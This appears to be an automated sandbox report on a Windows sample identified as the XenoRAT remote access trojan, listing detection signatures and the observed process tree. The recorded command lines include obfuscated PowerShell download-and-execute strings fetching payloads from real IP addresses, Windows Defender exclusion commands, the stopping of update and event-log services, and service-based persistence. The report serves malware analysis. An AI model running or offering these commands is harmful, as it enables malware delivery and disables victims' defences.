Edit tour
Windows
Analysis Report
file.exe
Overview
General Information
| Sample name: | file.exe |
| Analysis ID: | 1467504 |
| MD5: | 92d4e2ef88e5aafb72ddde13e84b549a |
| SHA1: | 24ddd5e2c7e96e52e00f5a6e2b29e4b100d0c578 |
| SHA256: | a77d96f186d1cc96dc589f4a6d55b45c9c04c77072fd504a720f437412ff93cb |
| Tags: | exe |
| Infos: |   |
 | |
Detection
XenoRAT
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Yara detected Powershell download and execute
Yara detected XenoRAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Downloads files with wrong headers with respect to MIME Content-Type
Found direct / indirect Syscall (likely to bypass EDR)
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
PE file contains section with special chars
Powershell drops PE file
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to evade debugger and weak emulator (self modifying code)
Uses ipconfig to lookup or modify the Windows network settings
Uses powercfg.exe to modify the power settings
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Classification
- System is w10x64
file.exe (PID: 5680 cmdline: "C:\Users\ user\Deskt op\file.ex e" MD5: 92D4E2EF88E5AAFB72DDDE13E84B549A) 
powershell.exe (PID: 5492 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" $c1='(New- Object Net .We'; $c4= 'bClient). Downlo'; $ c3='adStri ng(''http: //85.28.47 .8/x/L.png '')';$TC=I `E`X ($c1, $c4,$c3 -J oin '')|I` E`X MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) 
conhost.exe (PID: 4616 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
ipconfig.exe (PID: 992 cmdline: "C:\Window s\system32 \ipconfig. exe" /flus hdns MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB) - cmd.exe (PID: 7084 cmdline:
"C:\Window s\system32 \cmd.exe" /c attrib +h C:\User s\Public\0 x1.log MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - attrib.exe (PID: 4032 cmdline:
attrib +h C:\Users\P ublic\0x1. log MD5: 0E938DD280E83B1596EC6AA48729C2B0) - ipconfig.exe (PID: 6204 cmdline:
"C:\Window s\system32 \ipconfig. exe" /flus hdns MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB) - RegSvcs.exe (PID: 5396 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Reg Svcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94) - powershell.exe (PID: 6600 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" $c1='(New- Object Net .We'; $c4= 'bClient). Downlo'; $ c3='adStri ng(''http: //85.28.47 .8/x/M.png '')';$TC=I `E`X ($c1, $c4,$c3 -J oin '')|I` E`X MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 6368 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - ipconfig.exe (PID: 3184 cmdline:
"C:\Window s\system32 \ipconfig. exe" /flus hdns MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB) - powershell.exe (PID: 2248 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Add-MpPref erence -Ex clusionPat h c:\ MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) 
LB311.exe (PID: 420 cmdline: "C:\Users\ user\AppDa ta\Roaming \LB311.exe " MD5: C4BEF67027DB50C7F4F3A64584FED4A7) - powershell.exe (PID: 3300 cmdline:
C:\Windows \system32\ WindowsPow erShell\v1 .0\powersh ell.exe Ad d-MpPrefer ence -Excl usionPath @($env:Use rProfile, $env:Progr amData) -E xclusionEx tension '. exe' -Forc e MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 5748 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 7312 cmdline:
C:\Windows \system32\ cmd.exe /c wusa /uni nstall /kb :890830 /q uiet /nore start MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7328 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
wusa.exe (PID: 7400 cmdline: wusa /unin stall /kb: 890830 /qu iet /nores tart MD5: FBDA2B8987895780375FE0E6254F6198) - sc.exe (PID: 7320 cmdline:
C:\Windows \system32\ sc.exe sto p UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80) - conhost.exe (PID: 7336 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - sc.exe (PID: 7416 cmdline:
C:\Windows \system32\ sc.exe sto p WaaSMedi cSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80) - conhost.exe (PID: 7424 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - sc.exe (PID: 7476 cmdline:
C:\Windows \system32\ sc.exe sto p wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80) - conhost.exe (PID: 7484 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - sc.exe (PID: 7528 cmdline:
C:\Windows \system32\ sc.exe sto p bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80) - conhost.exe (PID: 7536 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - sc.exe (PID: 7576 cmdline:
C:\Windows \system32\ sc.exe sto p dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80) - conhost.exe (PID: 7584 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powercfg.exe (PID: 7624 cmdline:
C:\Windows \system32\ powercfg.e xe /x -hib ernate-tim eout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705) - conhost.exe (PID: 7640 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powercfg.exe (PID: 7632 cmdline:
C:\Windows \system32\ powercfg.e xe /x -hib ernate-tim eout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705) - conhost.exe (PID: 7656 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powercfg.exe (PID: 7648 cmdline:
C:\Windows \system32\ powercfg.e xe /x -sta ndby-timeo ut-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705) - conhost.exe (PID: 7692 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powercfg.exe (PID: 7684 cmdline:
C:\Windows \system32\ powercfg.e xe /x -sta ndby-timeo ut-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705) - conhost.exe (PID: 7732 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
dialer.exe (PID: 7724 cmdline: C:\Windows \system32\ dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93) 
winlogon.exe (PID: 560 cmdline: winlogon.e xe MD5: F8B41A1B3E569E7E6F990567F21DCE97) - lsass.exe (PID: 652 cmdline:
C:\Windows \system32\ lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A) - svchost.exe (PID: 928 cmdline:
C:\Windows \system32\ svchost.ex e -k DcomL aunch -p - s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - dwm.exe (PID: 996 cmdline:
"dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C) - svchost.exe (PID: 436 cmdline:
C:\Windows \system32\ svchost.ex e -k netsv cs -p -s g psvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - sc.exe (PID: 7800 cmdline:
C:\Windows \system32\ sc.exe del ete "LIB" MD5: 3FB5CF71F7E7EB49790CB0E663434D80) - conhost.exe (PID: 7820 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - sc.exe (PID: 7876 cmdline:
C:\Windows \system32\ sc.exe cre ate "LIB" binpath= " C:\Program Data\Mig\M ig.exe" st art= "auto " MD5: 3FB5CF71F7E7EB49790CB0E663434D80) - conhost.exe (PID: 7884 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - sc.exe (PID: 7944 cmdline:
C:\Windows \system32\ sc.exe sto p eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80) - conhost.exe (PID: 7968 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - sc.exe (PID: 7952 cmdline:
C:\Windows \system32\ sc.exe sta rt "LIB" MD5: 3FB5CF71F7E7EB49790CB0E663434D80) - conhost.exe (PID: 7960 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 4208 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" $c1='(New- Object Net .We'; $c4= 'bClient). Downlo'; $ c3='adStri ng(''http: //85.28.47 .8/S.png'' )';$TC=I`E `X ($c1,$c 4,$c3 -Joi n '')|I`E` X MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 5424 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
wscript.exe (PID: 5028 cmdline: "C:\Window s\system32 \wscript.e xe" //E:VB Script C:\ Users\Publ ic\0x1.log //Nologo MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 5088 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" $c1='(New- Object Net .We'; $c4= 'bClient). Downlo'; $ c3='adStri ng(''http: //176.113. 115.177/x/ 5.png'')'; $TC=I`E`X ($c1,$c4,$ c3 -Join ' ')|I`E`X MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 3580 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - ipconfig.exe (PID: 2924 cmdline:
"C:\Window s\system32 \ipconfig. exe" /flus hdns MD5: 62F170FB07FDBB79CEB7147101406EB8) - RegSvcs.exe (PID: 1708 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Reg Svcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94) - svchost.exe (PID: 2924 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- wscript.exe (PID: 1112 cmdline:
"C:\Window s\system32 \wscript.e xe" //E:VB Script C:\ Users\Publ ic\0x1.log //Nologo MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 7176 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" $c1='(New- Object Net .We'; $c4= 'bClient). Downlo'; $ c3='adStri ng(''http: //176.113. 115.177/x/ 5.png'')'; $TC=I`E`X ($c1,$c4,$ c3 -Join ' ')|I`E`X MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7184 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - ipconfig.exe (PID: 7976 cmdline:
"C:\Window s\system32 \ipconfig. exe" /flus hdns MD5: 62F170FB07FDBB79CEB7147101406EB8) - RegSvcs.exe (PID: 8188 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Reg Svcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
- Mig.exe (PID: 8040 cmdline:
C:\Program Data\Mig\M ig.exe MD5: C4BEF67027DB50C7F4F3A64584FED4A7)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_XenoRAT | Yara detected XenoRAT | Joe Security | ||
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_XenoRAT | Yara detected XenoRAT | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Change of critical system settings |   |
|---|
| Source: | Author: Joe Security: | ||
System Summary | |
|---|
| Source: | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): | ||
| Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: | ||
| Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): | ||
HIPS / PFW / Operating System Protection Evasion | |
|---|
| Source: | Author: Joe Security: | ||
⊘No Snort rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection | |
|---|
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Virustotal: | Perma Link | ||
| Source: | Integrated Neural Analysis Model: | ||
| Source: | Joe Sandbox ML: | ||
| Source: | Joe Sandbox ML: | ||
| Source: | Joe Sandbox ML: | ||
| Source: | Static PE information: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Code function: | 55_2_000002D0165EDCE0 | |
| Source: | Code function: | 58_2_000002D6F151DCE0 | |
| Source: | Code function: | 66_2_0000014E41FDDCE0 | |
| Source: | Code function: | 67_2_000001D15B05DCE0 | |
| Source: | Code function: | 68_2_0000023AF32EDCE0 | |
Software Vulnerabilities | |
|---|
| Source: | Child: | ||
Networking | |
|---|
| Source: | Image file has PE prefix: | ||